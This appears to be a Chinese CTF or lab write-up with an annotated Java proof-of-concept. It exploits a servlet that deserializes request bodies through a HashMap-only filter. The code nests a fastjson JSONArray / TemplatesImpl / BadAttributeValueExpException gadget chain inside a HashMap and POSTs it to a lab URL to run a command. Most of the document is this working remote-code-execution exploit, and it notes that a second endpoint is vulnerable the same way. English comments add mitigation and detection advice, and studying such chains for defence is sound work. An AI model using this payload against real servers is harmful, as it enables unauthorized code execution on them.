public void doAction(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try (ObjectInputStream in = null;){
in = new FilteredObjectInputStream((InputStream)request.getInputStream(), new Class[]{HashMap.class});
HashMap headInfo = (HashMap)in.readObject();
String dsName = (String)headInfo.get("dsName");
...
限制只能反序列化HashMap
套个HashMap然后打fastjson经典链子
BadAttributeValueExpException#readObject -> JSONArray#toString -> JSONArray#toJSONString -> getter
package org.example;
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.HashMap;
/**
* @ClassName unser1
* @Description
* @Author Xutao
* @Date 2025年09月29日 17:43
* @Version 1.0
*/
public class unser1 {
    // Proof-of-concept client for the servlet shown at the top of this page. That servlet wraps
    // request.getInputStream() in a FilteredObjectInputStream whose allow-list is {HashMap.class}
    // and casts the result to HashMap. The payload built below is a HashMap whose VALUE carries the
    // gadget chain described in the writeup (BadAttributeValueExpException#readObject ->
    // JSONArray#toString -> getter), so the top-level type check passes while nested objects are
    // still resolved. NOTE(review): this implies the filter inspects only the outermost class —
    // confirm against FilteredObjectInputStream#resolveClass, which is not on this page.
    //
    // Mitigation (server side): do not accept Java-native serialization from an HTTP body at all.
    // If it cannot be removed, install a JDK ObjectInputFilter (JEP 290) with a strict allow-list —
    // the JDK applies it to EVERY class resolved in the stream, not just the first one — together
    // with maxdepth/maxrefs limits, and keep gadget-bearing libraries (fastjson here) off the
    // classpath. Detection: request bodies to this endpoint beginning with the serialization magic
    // 0xACED0005, and the servlet container's JVM spawning child processes.

    /**
     * Builds the nested payload described in the writeup, serializes it and POSTs it to the
     * hard-coded lab URL. Takes no arguments; target and command are constants.
     *
     * @param args ignored
     * @throws Exception any javassist, reflection, serialization or network failure is propagated
     */
    public static void main(String[] args) throws Exception {
        // Lab target and command from the writeup; both are constants in this PoC.
        String url = "http://10.0.2.8/servlet/FileManageServlet";
        String command = "calc";
        // Generate a class extending AbstractTranslet whose no-arg constructor calls
        // Runtime.exec(command). TemplatesImpl is what later instantiates this class.
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("pool");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[0], clazz);
        constructor.setBody("Runtime.getRuntime().exec(\"" + command + "\");");
        clazz.addConstructor(constructor);
        byte[][] bytes = {clazz.toBytecode()};
        // Populate TemplatesImpl's private fields reflectively (no public setters exist for them).
        // NOTE(review): "_name" = "null" and "_tfactory" = null are the values the writeup uses;
        // which of them TemplatesImpl actually requires is not established here.
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setValue(templates, "_bytecodes", bytes);
        setValue(templates, "_name", "null");
        setValue(templates, "_tfactory", null);
        // fastjson JSONArray holding the TemplatesImpl; per the writeup its toString() ends up
        // invoking the element's getters.
        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templates);
        // Per the writeup, BadAttributeValueExpException#readObject calls toString() on "val".
        // The field is private, hence the reflective write.
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        setFieldValue(badAttributeValueExpException, "val", jsonArray);
        // Outermost object is a plain HashMap — the one class the servlet's filter permits.
        // The gadget is only a map value, which the top-level check never looks at.
        HashMap<Object, Object> hashmap = new HashMap<Object, Object>();
        hashmap.put("xx",badAttributeValueExpException);
        byte[] payload = serialize(hashmap);
        // Raw POST of the serialized bytes; the servlet reads them directly from the request body.
        HttpURLConnection conn = (HttpURLConnection) (new URL(url)).openConnection();
        conn.setRequestMethod("POST");
        conn.setDoOutput(true);
        conn.setRequestProperty("Content-Type", "application/octet-stream");
        conn.setRequestProperty("Content-Length", String.valueOf(payload.length));
        // Not try-with-resources: an exception from write()/flush() leaks the stream.
        OutputStream os = conn.getOutputStream();
        os.write(payload);
        os.flush();
        os.close();
        // NOTE: HTTP 200 only means the servlet completed without an error status; it does not
        // prove the command ran, and the response body is never read.
        if (conn.getResponseCode() == 200) {
            System.out.println("命令执行成功");
        } else {
            System.out.println("命令执行失败");
        }
    }

    /**
     * Reflectively writes a private field declared directly on {@code obj}'s class.
     * {@code getDeclaredField} does not search superclasses, so inherited fields are not found.
     * Duplicates {@link #setFieldValue(Object, String, Object)}.
     *
     * @param obj   instance whose field is written
     * @param name  declared field name
     * @param value new value (may be null)
     * @throws Exception NoSuchFieldException / IllegalAccessException from the reflection calls
     */
    public static void setValue(Object obj, String name, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    /**
     * Serializes {@code obj} with Java-native serialization into a byte array.
     * The ObjectOutputStream is neither flushed nor closed before {@code toByteArray()};
     * NOTE(review): this relies on writeObject draining its block-data buffer — a flush()
     * (or try-with-resources) before reading the bytes would be the robust form.
     *
     * @param obj object graph to serialize; must be Serializable
     * @return the serialized bytes
     * @throws IOException if serialization fails (e.g. a non-serializable element)
     */
    public static byte[] serialize(Object obj) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        return out.toByteArray();
    }

    /**
     * Identical to {@link #setValue(Object, String, Object)}: reflectively writes a private field
     * declared directly on {@code obj}'s class (superclass fields are not searched).
     *
     * @param obj   instance whose field is written
     * @param field declared field name
     * @param arg   new value (may be null)
     * @throws Exception NoSuchFieldException / IllegalAccessException from the reflection calls
     */
    public static void setFieldValue(Object obj, String field, Object arg) throws Exception {
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}
然后发现LoginVideoServlet接口也存在同样的漏洞
HashMap headInfo = (HashMap)in.readObject();
照样打即可。